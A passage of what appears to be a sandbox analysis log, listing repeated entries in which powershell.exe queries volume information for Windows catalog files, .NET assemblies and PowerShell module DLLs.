                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
